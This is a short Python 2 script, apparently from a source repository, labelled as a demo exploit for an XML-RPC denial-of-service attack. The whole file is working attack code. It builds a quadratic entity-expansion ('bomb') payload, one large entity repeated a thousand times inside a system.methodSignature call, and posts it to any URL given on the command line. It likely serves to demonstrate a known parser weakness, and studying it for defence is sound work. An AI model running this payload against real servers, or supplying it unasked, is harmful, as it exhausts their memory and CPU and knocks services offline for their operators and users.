blob: da8e8d0b64b67916c8d33048a5c4957e5d3dab1e (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
#!/usr/bin/python
"""Demo exploit for XML-RPC DoS attack
Author: Christian Heimes
"""
import sys
import urllib2
if len(sys.argv) != 2:
sys.exit("{} url".format(sys.argv[0]))
url = sys.argv[1]
xml = """<?xml version='1.0'?>
<!DOCTYPE bomb [
<!ENTITY a "VALUE">
]>
<methodCall>
<methodName>system.methodSignature</methodName>
<params>
<param>
<value><string>QUAD</string></value>
</param>
</params>
</methodCall>
"""
xml = xml.replace("VALUE", "a" * 100000)
xml = xml.replace("QUAD", "&a;" * 1000)
headers = {"Content-Type": "text/xml", "Content-Length": len(xml)}
req = urllib2.Request(url, data=xml, headers=headers)
print("Sending request to {}".format(url))
resp = urllib2.urlopen(req)
print("Response")
print(resp.read())
|
